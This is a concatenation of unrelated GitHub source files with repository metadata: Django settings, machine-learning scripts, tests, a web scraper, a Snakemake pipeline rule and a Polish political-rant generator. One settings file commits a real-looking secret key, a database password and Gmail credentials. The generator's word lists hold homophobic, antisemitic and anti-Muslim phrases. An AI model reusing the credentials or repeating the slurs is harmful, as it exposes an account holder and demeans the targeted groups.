        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Kigali'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
LOGIN_REDIRECT_URL = 'index'
LOGOUT_REDIRECT_URL = 'index'
# Configure Django App for Heroku.
django_heroku.settings(locals())
|
[
"tesiregisele@gmail.com"
] |
tesiregisele@gmail.com
|
4067ade06122e3a02c1b9d764ce69d8d86e992ac
|
833c09e68b7dca5b71bee89c81578404d05feaf0
|
/ch5/a57.py
|
1e9c4188b3d65218c2ba064780cbfee244d370d7
|
[] |
no_license
|
muu4649/NLP100nock2020
|
669fa68f2f3b7f7a7deb4402cdaf7d9fd8aaf372
|
0031ac9b82135a81787dc3e5c77728a6d30c06c6
|
refs/heads/master
| 2022-10-24T22:27:30.785381
| 2020-06-11T22:31:06
| 2020-06-11T22:31:06
| 268,445,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
# Task 57: for the logistic-regression model trained in task 52, report the
# ten features with the highest weights and the ten with the lowest weights.
import pandas as pd
import joblib
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix

clf = joblib.load('model.joblib')
vocabulary_ = joblib.load('vocabulary_.joblib')

# clf.coef_ holds one row of feature weights per class.
for class_weights in clf.coef_:
    feature_weight = dict(zip(vocabulary_, class_weights))
    top10 = sorted(feature_weight.items(), key=lambda kv: abs(kv[1]), reverse=True)[:10]
    print(top10)
    bottom10 = sorted(feature_weight.items(), key=lambda kv: abs(kv[1]), reverse=False)[:10]
    print(bottom10)
|
[
"noreply@github.com"
] |
noreply@github.com
|
6b671ac29a86fe4af2a6cb41bb64ef17873657cf
|
c82e0c7ccb30e4f36c58957799e3a771efaff489
|
/btre/btre/settings.py
|
a71715265daa4ef05e5fe3d6ebfebc1bf7ad5098
|
[] |
no_license
|
kneeyaa/btre
|
36bf54811281d8c1a9918e9f39a44e9096324cb5
|
c3973e0c231d0f3d28c00b193e742a82408e0d29
|
refs/heads/master
| 2022-03-29T11:09:14.263730
| 2019-11-03T07:17:26
| 2019-11-03T07:17:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,955
|
py
|
"""
Django settings for btre project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
from django.contrib.messages import constants as messages
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECURITY NOTE(review): the secret key is hard-coded and committed — move it
# to an environment variable before deploying.
SECRET_KEY = 'q_2gu@fzb=v*1f36f&tnuw0ejcm_cv2+%_bqoggyn^yhjm_kzk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'pages.apps.PagesConfig',
    'listings.apps.ListingsConfig',
    'realtors.apps.RealtorsConfig',
    'accounts.apps.AccountsConfig',
    'contacts.apps.ContactsConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.humanize',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'btre.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATES_DIR, ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'btre.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# SECURITY NOTE(review): database credentials are committed in source control —
# load them from the environment instead.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'btredb',
        'USER': 'postgres',
        'PASSWORD': 'XevX21@NY',
        'HOST': 'localhost',
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'btre/static')
]
# Media Folder Setting
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Render Django "error" messages with Bootstrap's "danger" CSS class.
MESSAGE_TAGS = {
    messages.ERROR: 'danger',
}
# Email Config
# SECURITY NOTE(review): real Gmail credentials are committed here — revoke
# them and read from environment variables.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST_USER = 'niya.contact@gmail.com'
EMAIL_HOST_PASSWORD = 'XevX21@NY'
|
[
"220497+KrNiYa@users.noreply.github.com"
] |
220497+KrNiYa@users.noreply.github.com
|
7d8b85fbd6ee38f75738a568080c51ef08cbef54
|
2499c41e3c8cee44cdf5fed3ac917b921306c537
|
/features/environment.py
|
d0b7b79184a56b0bab57707c098a15764dfc3126
|
[
"BSD-3-Clause"
] |
permissive
|
aduston-snaplogic/nextbus_client
|
27fb4f45f5b9ab6b0b8d0af532db192235d17c81
|
b9f69e38683d22a832d93bbd98f561a1b7e51358
|
refs/heads/master
| 2021-09-03T09:14:41.069777
| 2018-01-08T00:47:50
| 2018-01-08T00:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,502
|
py
|
"""
environment.py - Set up the environment for the behave tests.
"""
import nextbus_client
import pickle
def before_all(context):
    """Create the nextbus API client once and expose it on the behave context."""
    client = nextbus_client.Client()
    context.client = client
    context.base_url = client.api_url
    context.headers = client.headers
def before_feature(context, feature):
    """Point client-tagged features at the client mock-data directory."""
    if 'client' not in feature.tags:
        return
    context.mocks_directory = './features/mocks/client'
def before_tag(context, tag):
    """Load the pickled API fixture matching *tag* onto the behave context.

    Each known tag maps to a pickle file inside ``context.mocks_directory``
    and the context attribute the sample is stored on; unknown tags are
    ignored.

    BUG FIX: the original called ``pickle.load(open(...))`` and never closed
    the file handles; a ``with`` block now closes them deterministically.
    """
    fixtures = {
        'agencyList': ('agency_list.p', 'agency_list_sample'),
        'routeList': ('route_list_sf-muni.p', 'route_list_sample'),
        'routeConfig': ('route_config_sf-muni_N.p', 'route_config_sample'),
        'predictions': ('predictions_sf-muni_N_5205.p', 'predictions_sample'),
        'predictionsForMultiStops': (
            'multi_stop_predictions_sf-muni_N_6997_3909.p',
            'multi_stop_predictions_sample',
        ),
    }
    if tag in fixtures:
        filename, attribute = fixtures[tag]
        pickle_file = "{0}/{1}".format(context.mocks_directory, filename)
        with open(pickle_file, 'rb') as handle:
            setattr(context, attribute, pickle.load(handle))
|
[
"adamduston@gmail.com"
] |
adamduston@gmail.com
|
3a5e3c2e15f0e9ec3f7c4f139ac435cef942c429
|
84b08a60e49e702e51b8c3bd0c558fbd957e11ae
|
/LatestAlgorithms/SVM.py
|
28692dc75e49da2349af66a00b5e9ad5073e963c
|
[] |
no_license
|
akhalayly/GoldenBoy
|
787732656250bc52ad0076dca35f15abbd2f4f14
|
fb88b656525c3bc614a24b982acf4d1ae745aa8b
|
refs/heads/main
| 2023-02-06T02:17:53.197336
| 2020-12-28T20:07:14
| 2020-12-28T20:07:14
| 304,894,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,205
|
py
|
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.model_selection import KFold
from sklearn.feature_selection import SelectKBest, chi2
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import Positions_Traits as posT
import helperFunctions as hf
if __name__ == '__main__':
    # One labelled-player dataset per field position.
    files = ["CAMS", "CBs", "CMs", "CDMs", "GKs", "LBs", "LMs", "RBs", "RMs",
             "Strikers"]
    for file in files:
        dataset = pd.read_csv("Success_" + file + ".csv")
        # Collect the column indexes of the traits relevant to this position.
        attrbs = []
        attrbs = attrbs + hf.roleTraitIndexesFinder(["Age"], dataset.columns, hf.year_2012)
        attrbs = attrbs + hf.roleTraitIndexesFinder(posT.General_Info, dataset.columns, "")
        attrbs = attrbs + hf.roleTraitIndexesFinder(posT.Positive_Traits, dataset.columns, hf.year_2012)
        for role in posT.positionToTraits[file]:
            attrbs = attrbs + hf.roleTraitIndexesFinder(role, dataset.columns, hf.year_2012)
        # De-duplicate indexes gathered from overlapping trait groups.
        attrbs = list(set(attrbs))
        X = dataset.iloc[:, attrbs].values.astype(float)
        # NOTE(review): the last column appears to be the success label — confirm.
        y = dataset.iloc[:, -1].values
        X = hf.normalizeAge(hf.normalizeMarketValue(hf.normalizeCA(X, 1), -1, file), 0)
        # X = SelectKBest(chi2, k=10).fit_transform(X, y)
        kf = KFold(n_splits=5)
        splits = []
        # Mean accuracy per kernel; one entry per C value tested below.
        kernel_results = {
            'linear': [],
            'poly': [],
            'rbf': [],
            'sigmoid': []
        }
        # Materialise the folds once so every kernel/C pair sees identical splits.
        for train, test in kf.split(X):
            splits.append((train, test))
        for kernel in ['linear', 'poly', 'rbf', 'sigmoid']:
            c_kernel_results = [0] * 6  # one accuracy accumulator per C value
            index = 0
            for c in [0.01, 0.1, 0.5, 1, 2, 5]:
                for train_index, test_index in splits:
                    X_train, X_test = X[train_index], X[test_index]
                    y_train, y_test = y[train_index], y[test_index]
                    clf = svm.SVC(kernel=kernel, C=c)
                    clf.fit(X_train, y_train)
                    pred_i = clf.predict(X_test)
                    choseOne = 0
                    choseZero = 0
                    # Accumulate the mean accuracy over the folds for this C.
                    c_kernel_results[index] += ((1 - np.mean(pred_i != y_test)) / splits.__len__())
                index += 1
            kernel_results[kernel] = c_kernel_results
            # print("Timo prediction is: " + str(clf.predict([X[111]])[0]))
            # for i in range(len(pred_i)):
            # if pred_i[i] != y_test[i] and pred_i[i] == 1:
            # choseOne = choseOne + 1
            # elif pred_i[i] != y_test[i]:
            # choseZero = choseZero + 1
            # print("choseZero: " + str(len(pred_i) - sum(pred_i)) + " choseZero: " + str(
            # choseZero) + " Ratio of wrong Zeros: " + str(choseZero / (len(pred_i) - sum(pred_i))))
            # print("choseOne: " + str(sum(pred_i)) + " choseOneWrong: " + str(
            # choseOne) + " Ratio of wrong Ones: " + str(choseOne / sum(pred_i)))
            print(kernel + " Last Accuracy is: " + str(kernel_results[kernel]))
        # Plot accuracy vs C for all four kernels.
        plt.figure(figsize=(12, 6))
        plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['linear'], color='red', marker='o',
                 markerfacecolor='red', markersize=10)
        plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['poly'], color='blue', marker='o',
                 markerfacecolor='blue', markersize=10)
        plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['rbf'], color='black', marker='o',
                 markerfacecolor='black', markersize=10)
        plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['sigmoid'], color='brown', marker='o',
                 markerfacecolor='brown', markersize=10)
        plt.title('Accuracy Rate SVM ' + file)
        plt.xlabel('C Value')
        plt.ylabel('Mean Accuracy')
        plt.legend([str(i) for i in kernel_results.keys()])
        plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
f4144879abb95c5a24464b291c1a13b6c973d8f5
|
9ca1ed4689a90b880c2ffcf18661bccedc62e8d6
|
/BeautifulSoup1.py
|
c714f658017e46b5fa77706a6ce92e554085bcfe
|
[] |
no_license
|
Beena1995/hello-world
|
c7e77a6b1569cbf7988f21f8dd4a4509a080ac60
|
1fd207bc2fb49dd7ae537645cffe17fc6900e41c
|
refs/heads/master
| 2021-05-03T12:15:08.527619
| 2016-10-06T08:17:26
| 2016-10-06T08:17:26
| 70,133,029
| 0
| 0
| null | 2016-10-06T08:14:15
| 2016-10-06T07:39:03
| null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
import urllib
from BeautifulSoup import*
url=raw_input('Enter url:')
html=urllib.urlopen(url).read()
soup=BeautifulSoup(html)
tags=soup('a')
for tag in tags:
print 'TAG:',tag
print 'URL:',tag.get('href',None)
print 'Content:',tag.contents[0]
print 'Attrs:',tag.attrs
|
[
"noreply@github.com"
] |
noreply@github.com
|
d3ae04ec689b0df5817ece49cecea5ae6c4698d0
|
54fb38832e2f06a376c02d0fb106b5a9321279c9
|
/korwin.py
|
201dbde8a11525196493caad24f9bfb329365908
|
[
"Unlicense"
] |
permissive
|
sqbi-q/korwin
|
6c73cbf5c93fe6a0cdebb68505ebfa3d4e364849
|
c3762e1c9210710c59d7d59644bd023ab7ea4856
|
refs/heads/master
| 2023-01-23T03:40:57.526261
| 2020-12-04T08:38:14
| 2020-12-04T08:38:14
| 261,270,327
| 0
| 0
|
Unlicense
| 2020-05-04T18:57:21
| 2020-05-04T18:57:20
| null |
UTF-8
|
Python
| false
| false
| 6,051
|
py
|
from random import choice
# Six pools of Polish sentence fragments; picking one random entry from each
# pool, in order, produces a complete satirical "Korwin-style" statement.
parts = [
    [  # 1. opening phrases
        "Proszę zwrócić uwagę, że",
        "I tak mam trzy razy mniej czasu, więc prosze pozwolić mi powiedzieć:",
        "Państwo się śmieją, ale",
        "Ja nie potrzebowałem edukacji seksualnej, żeby wiedzieć, że",
        "No niestety:",
        "Gdzie leży przyczyna problemu? Ja państwu powiem:",
        "Państwo chyba nie widzą, że",
        "Oświadczam kategorycznie:",
        "Powtarzam:",
        "Powiedzmy to z całą mocą:",
        "W Polsce dzisiaj",
        "Państwo sobie nie zdają sprawy, że",
        "To ja przepraszam bardzo:",
        "Otóż nie wiem czy pan wie, że",
        "Yyyyy...",
        "Ja chcę powiedzieć jedną rzecz:",
        "Trzeba powiedzieć jasno:",
        "Jak powiedział wybitny krakowianin Stanisław Lem,",
        "Proszę mnie dobrze zrozumieć:",
        "Ja chciałem państwu przypomnieć, że",
        "Niech państwo nie mają złudzeń:",
        "Powiedzmy to wyraźnie:"
    ],
    [  # 2. subjects (who)
        "właściciele niewolników",
        "związkowcy",
        "trockiści",
        "tak zwane dzieci kwiaty",
        "rozmaici urzędnicy",
        "federaści",
        "etatyści",
        "ci durnie i złodzieje",
        "ludzie wybrani głosami meneli spod budki z piwem",
        "socjaliści pobożni",
        "socjaliści bezbożni",
        "komuniści z krzyżem w zębach",
        "agenci obcych służb",
        "członkowie Bandy Czworga",
        "pseudo-masoni z Wielkiego Wschodu Francji",
        "przedstawiciele czerwonej hołoty",
        "ci wszyscy (tfu!) geje",
        "funkcjonariusze reżymowej telewizji",
        "tak zwani ekolodzy",
        "ci wszyscy (tfu!) demokraci",
        "agenci bezpieki",
        "feminazistki"
    ],
    [  # 3. qualifiers (how / in what manner)
        "po przeczytaniu Manifestu Komunistycznego",
        "którymi się brzydzę",
        "których nienawidzę",
        "z okolic Gazety Wyborczej",
        "czyli taka żydokomuna",
        "odkąd zniesiono karę śmierci",
        "którymi pogardzam",
        "których miejsce w normalnym kraju jest w więzieniu",
        "na polecenie Brukseli",
        "posłusznie",
        "bezmyślnie",
        "z nieprawdopodobną pogardą dla człowieka",
        "za pieniądze podatników",
        "zgodnie z ideologią LGBTQZ",
        "za wszelką cenę",
        "zupełnie bezkarnie",
        "całkowicie bezczelnie",
        "o poglądach na lewo od komunizmu",
        "celowo i świadomie",
        "z premedytacją",
        "od czasów Okrągłego Stołu",
        "w ramach postępu"
    ],
    [  # 4. actions (what they do)
        "udają homoseksualistów",
        "niszczą rodzinę",
        "idą do polityki",
        "zakazują góralom robienia oscypków",
        "organizują paraolimpiady",
        "wprowadzają ustrój, w którym raz na cztery lata można wybrać sobie pana",
        "ustawiają fotoradary",
        "wprowadzają dotacje",
        "wydzielają buspasy",
        "podnoszą wiek emerytalny",
        "rżną głupa",
        "odbierają dzieci rodzicom",
        "wprowadzają absurdalne przepisy",
        "umieszczają dzieci w szkołach koedukacyjnych",
        "wprowadzają parytety",
        "nawołują do podniesienia podatków",
        "próbują wyrzucić kierowców z miast",
        "próbują skłócić Polskę z Rosją",
        "głoszą brednie o globalnym ociepleniu",
        "zakazują posiadania broni",
        "nie dopuszczają prawicy do władzy",
        "uczą dzieci homoseksualizmu"
    ],
    [  # 5. motivations (why)
        "żeby poddawać wszystkich tresurze",
        "bo taka jest ich natura",
        "bo chcą wszystko kontrolować",
        "bo nie rozumieją, że socjalizm nie działa",
        "żeby wreszcie zapanował socjalizm",
        "dokładnie tak jak tow. Janosik",
        "zamiast pozwolić ludziom zarabiać",
        "żeby wyrwać kobiety z domu",
        "bo to jest w interesie tak zwanych ludzi pracy",
        "zamiast pozwolić decydować konsumentowi",
        "żeby nie opłacało się mieć dzieci",
        "zamiast obniżyć podatki",
        "bo nie rozumieją, że selekcja naturalna jest czymś dobrym",
        "żeby mężczyźni przestali być agresywni",
        "bo dzięki temu mogą brać łapówki",
        "bo dzięki temu moga kraść",
        "bo dostają za to pieniądze",
        "bo tak się uczy w państwowej szkole",
        "bo bez tego (tfu!) demokracja nie może istnieć",
        "bo głupich jest więcej niż mądrych",
        "bo chcą stworzyć raj na ziemi",
        "bo chcą niszczyć cywilizacje białego człowieka"
    ],
    [  # 6. closing remarks
        "co ma zresztą tyle samo sensu, co zawody w szachach dla debili.",
        "co zostało dokładnie zaplanowane w Magdalence przez śp. generała Kiszczaka.",
        "i trzeba być idiotą, żeby ten system popierać.",
        "ale nawet ja jeszcze dożyję normalnych czasów.",
        "co dowodzi, że wyskrobano nie tych, co trzeba.",
        "a zwykłym ludziom wmawiają, że im coś \"dadzą\".",
        "— cóż: chcieliście (tfu!) demokracji, to macie.",
        "dlatego trzeba zlikwidować koryto, a nie zmieniać świnie.",
        "a wystarczyłoby przestać wypłacać zasiłki.",
        "podczas gdy normalni ludzie uważani są za dziwaków.",
        "co w wieku XIX po prostu by wyśmiano.",
        "— dlatego w społeczeństwie jest równość, a powinno być rozwarstwienie.",
        "co prowadzi polskę do katastrofy.",
        "— dlatego trzeba przywrócić normalność.",
        "ale w wolnej Polsce pójdą siedzieć.",
        "przez kolejne kadencje.",
        "o czym się nie mówi.",
        "i właśnie dlatego Europa umiera.",
        "ale przyjdą muzułmanie i zrobią porządek.",
        "— tak samo zresztą jak za Hitlera.",
        "— proszę zobaczyć, co się dzieje na Zachodzie, jeśli mi państwo nie wierzą.",
        "co lat temu sto nikomu nie przyszłoby nawet do głowy."
    ]
]
# Emit one random fragment from each of the six pools, in order, each
# followed by a single space (no trailing newline).
for pool in parts:
    print(choice(pool), end=" ")
|
[
"stefankar1000@gmail.com"
] |
stefankar1000@gmail.com
|
24c9430411ba12db5d1fb7f0ac009a54a6d48284
|
f69aa4ac2d92102a2cc9081f6acde24f5a1125ae
|
/base/session5_dict.py
|
c9db5095044fdba3c2658c0bb787834a39e60224
|
[] |
no_license
|
jobpool/python_learning
|
9af5fd102c7698b417763c6c80947a276fc3db89
|
4e4c96d9eb1be31339c5675b6878f7ca4be83d09
|
refs/heads/master
| 2022-12-08T13:15:16.586731
| 2020-09-05T03:52:23
| 2020-09-05T03:52:23
| 287,920,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
# #字典的定义
# d1 = {"a":1,"b":2}
# print(type(d1),d1)
# #键值是唯一的
# d2 = {"a":1,"b":2,"a":3}
# print(d2)
# #键值为字符串、数字、元组,不能是列表,要求不可变数据类型
# d3 = {"a":1,2:"b",(3,4):"c"}
# print(d3)
# #访问字典
# d4= {"a":1,"b":2}
# # print(d4["c"])
# # print(d4.get("c",0))
# print(d4)
# print(d4.pop("b"))
# print(d4)
# #添加键值到字典
# d5 = {"a":1,"b":2}
# d5["c"] = 3
# print(d5)
# #修改字典
# d6 = {"a":1,"b":2}
# # d6["b"]=3
# # print(d6)
# d7 = {"a":10,"b":20,"c":30}
# # print(id(d6))
# d6.update(d7)
# # print(id(d6))
# print(d6)
# Deletion examples (equivalent ways to remove a key):
#   d8 = {"a": 1, "b": 2}
#   del d8["b"]        # or: d8.pop("b")
#   print(d8)
# Membership check: dict.get() returns None when the key is missing.
d9 = {"a":1,"b":2}
# Alternatives: list(d9.keys()), list(d9.values()), "c" in d9
print(d9.get("c") is not None)
|
[
"feilongs@microsoft.com"
] |
feilongs@microsoft.com
|
d8eaaea2b3882116225b2f51d86ed91ade2b2d10
|
3df6fe86c55315e4c29a06c7ce010999ef2bd219
|
/my_app/migrations/0005_auto_20200814_1856.py
|
8d45533ee18d59287d6c27ddcb3ce598782e00fa
|
[] |
no_license
|
sjyothip/my_projects
|
05ae591717caa95da598f23cfc93868cd380855b
|
3755854519221ab08e89e7b0de3cff04ce8bc418
|
refs/heads/master
| 2022-12-08T09:38:44.878420
| 2020-08-31T11:52:38
| 2020-08-31T11:52:38
| 290,250,652
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 584
|
py
|
# Generated by Django 3.1 on 2020-08-14 13:26
from django.db import migrations, models
# Auto-generated Django migration: adds two optional columns to the
# my_app.Messages model — profile_pic (file upload) and sender_id
# (free-text identifier).
class Migration(migrations.Migration):
    dependencies = [
        ('my_app', '0004_messages'),
    ]
    operations = [
        migrations.AddField(
            model_name='messages',
            name='profile_pic',
            # blank/null allowed: the column is optional for existing rows.
            field=models.FileField(blank=True, null=True, upload_to='File'),
        ),
        migrations.AddField(
            model_name='messages',
            name='sender_id',
            field=models.CharField(blank=True, max_length=224, null=True),
        ),
    ]
|
[
"jyothis1304@gmail.com"
] |
jyothis1304@gmail.com
|
bda2afa73a058eb395fe5552b635d84a6d2f2e4d
|
c8e365146804863c90d0d37114008078514ab3df
|
/db_creation/rules/cluster_category_stats.smk
|
72e47686e0c94208e5c59aba2cba652aa7d7b683
|
[] |
no_license
|
nvt-1009/agnostos-wf
|
67fc9ac7e20af82d2ee4244debb66a6cb0657dd4
|
ece12b0cb2b55f67f4e468cb55b60dbddd11fc41
|
refs/heads/master
| 2023-04-25T19:45:06.315050
| 2021-06-06T11:08:58
| 2021-06-06T11:08:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,142
|
smk
|
# Compute per-category cluster statistics:
#   1) MMseqs2 taxonomy of cluster genes against UniProtKB,
#   2) Kaiju taxonomy against GTDB r89,
#   3) "darkness" annotation via a best-hit search against the Dark
#      Proteome Database (DPD),
#   4) an R script aggregates everything into the completeness / summary
#      tables and the list of high-quality (HQ) clusters.
# Each sub-step is skipped when its output file already exists and is
# non-empty ([[ ! -s ... ]] guards).
rule cluster_category_stats:
    input:
        k_db = config["rdir"] + "/cluster_category_DB/k_cons.index",
        cl_cat = config["rdir"] + "/cluster_categories/cluster_ids_categ.tsv",
    threads: 28
    params:
        mmseqs_bin = config["mmseqs_bin"],
        kaiju_bin = config["kaiju_bin"],
        mpi_runner = config["mpi_runner"],
        tmpl = config["mmseqs_local_tmp"],
        vmtouch = config["vmtouch"],
        taxdb = config["taxdb"],
        gtdb = config["gtdb_tax"],
        DPD = config["DPD"],
        dpd_info = config["dpd_info"],
        mmseqs_tax = "scripts/mmseqs_taxonomy.sh",
        kaiju_tax = "scripts/kaiju_taxonomy.sh",
        kaiju_parse = "scripts/kaiju_add_taxonomy.R",
        stats = "scripts/cluster_category_stats.r",
        ref = config["rdir"] + "/cluster_refinement/refined_clusters.tsv",
        refdb = config["rdir"] + "/cluster_refinement/refined_clusterDB",
        cl_cat_genes = config["rdir"] + "/cluster_categories/cluster_ids_categ_genes.tsv.gz",
        tax_dir = config["rdir"] + "/cluster_category_stats/taxonomy",
        tax = config["rdir"] + "/cluster_category_stats/taxonomy/cluster_mmseqs_taxonomy.tsv",
        kaiju_res = config["rdir"] + "/cluster_category_stats/taxonomy/cluster_kaiju_taxonomy.tsv",
        dark = config["rdir"] + "/cluster_category_stats/darkness/cluster_category_darkness.tsv",
        dark_dir = config["rdir"] + "/cluster_category_stats/darkness",
        compl = config["rdir"] + "/cluster_category_stats/cluster_category_completeness.tsv",
        outdir = config["rdir"] + "/cluster_category_stats"
    conda:
        config["conda_env"]
    output:
        HQ_clusters = config["rdir"] + "/cluster_category_stats/HQ_clusters.tsv",
        cat_stats = config["rdir"] + "/cluster_category_stats/cluster_category_summary_stats.tsv"
    log:
        out="logs/stats_stdout.log",
        err="logs/stats_stderr.err"
    benchmark:
        "benchmarks/cluster_category_stats/cat_stats.tsv"
    shell:
        """
        ## Cluster mmseqs2 taxonomy with UniProtKB
        mkdir -p {params.tax_dir}
        if [[ ! -s {params.tax} ]]; then
        {params.vmtouch} -f {params.taxdb}
        ./{params.mmseqs_tax} --search {params.mmseqs_bin} \
        --input {params.refdb} \
        --taxdb {params.taxdb} \
        --cl_info {params.cl_cat_genes} \
        --output {params.tax} \
        --outdir {params.outdir} \
        --mpi_runner "{params.mpi_runner}" \
        --threads {threads} 2>{log.err} 1>{log.out}
        fi
        ## Cluster Kaiju taxonomy with GTDB r89
        if [[ ! -s {params.kaiju_res} ]]; then
        {params.vmtouch} -f {params.gtdb}
        ./{params.kaiju_tax} --search {params.kaiju_bin} \
        --input {params.refdb} \
        --taxdb {params.gtdb} \
        --parsing {params.kaiju_parse} \
        --output {params.kaiju_res} \
        --tmpl {params.tmpl} \
        --threads {threads} 2>>{log.err} 1>>{log.out}
        fi
        ## Cluster level of darkness
        mkdir -p {params.dark_dir}
        if [[ ! -s {params.dark} ]]; then
        # Extract all sequences from the refined database set:
        sed -e 's/\\x0//g' {params.refdb} | gzip > {params.dark_dir}/refined_cl_genes.fasta.gz
        # Create MMseqs2 databases
        {params.mmseqs_bin} createdb {params.dark_dir}/refined_cl_genes.fasta.gz {params.dark_dir}/refined_cl_genes_db
        {params.mmseqs_bin} createdb {params.DPD} {params.dark_dir}/dpd_db
        # Search
        {params.mmseqs_bin} search {params.dark_dir}/refined_cl_genes_db {params.dark_dir}/dpd_db \
        {params.dark_dir}/refined_cl_genes_dpd_db {params.dark_dir}/tmp \
        --threads {threads} --max-seqs 300 \
        -e 1e-20 --cov-mode 0 -c 0.6 --mpi-runner "{params.mpi_runner}"
        {params.mmseqs_bin} convertalis {params.dark_dir}/refined_cl_genes_db {params.dark_dir}/dpd_db \
        {params.dark_dir}/refined_cl_genes_dpd_db {params.dark_dir}/refined_cl_genes_dpd.tsv \
        --format-mode 2 --threads {threads} \
        --format-output 'query,target,pident,alnlen,mismatch,gapopen,qstart,qend,tstart,tend,evalue,bits,qcov,tcov'
        rm -rf {params.dark_dir}/refined_cl_orfs.fasta.gz {params.dark_dir}/refined_cl_genes_db* {params.dark_dir}/dpd_db* {params.dark_dir}/refined_cl_genes_dpd_db* {params.dark_dir}/tmp
        # Extract best-hits
        export LANG=C; export LC_ALL=C; sort -k1,1 -k11,11g -k13,13gr -k14,14gr {params.dark_dir}/refined_cl_genes_dpd.tsv | \
        sort -u -k1,1 --merge > {params.dark_dir}/refined_cl_genes_dpd_bh.tsv
        # Join with cluster categories
        join -11 -23 <(awk '{{print $1,$2}}' {params.dark_dir}/refined_cl_genes_dpd_bh.tsv | sort -k1,1) \
        <(sort -k3,3 <(zcat {params.cl_cat_genes})) > {params.dark}
        sed -i 's/ /\\t/g' {params.dark}
        fi
        ## Cluster general stats
        ./{params.stats} --ref_clu {params.ref} \
        --clu_categ {input.cl_cat} \
        --mmseqs_tax {params.tax} \
        --kaiju_tax {params.kaiju_res} \
        --clu_dark {params.dark} \
        --dpd_info {params.dpd_info} \
        --compl {params.compl} \
        --hq_clu {output.HQ_clusters} \
        --summ_stats {output.cat_stats} \
        --output {params.outdir} 2>>{log.err} 1>>{log.out}
        """
# Sentinel rule: touch a .done marker once the category-statistics outputs
# exist, so downstream rules can depend on a single file.
rule cluster_categ_stats_done:
    input:
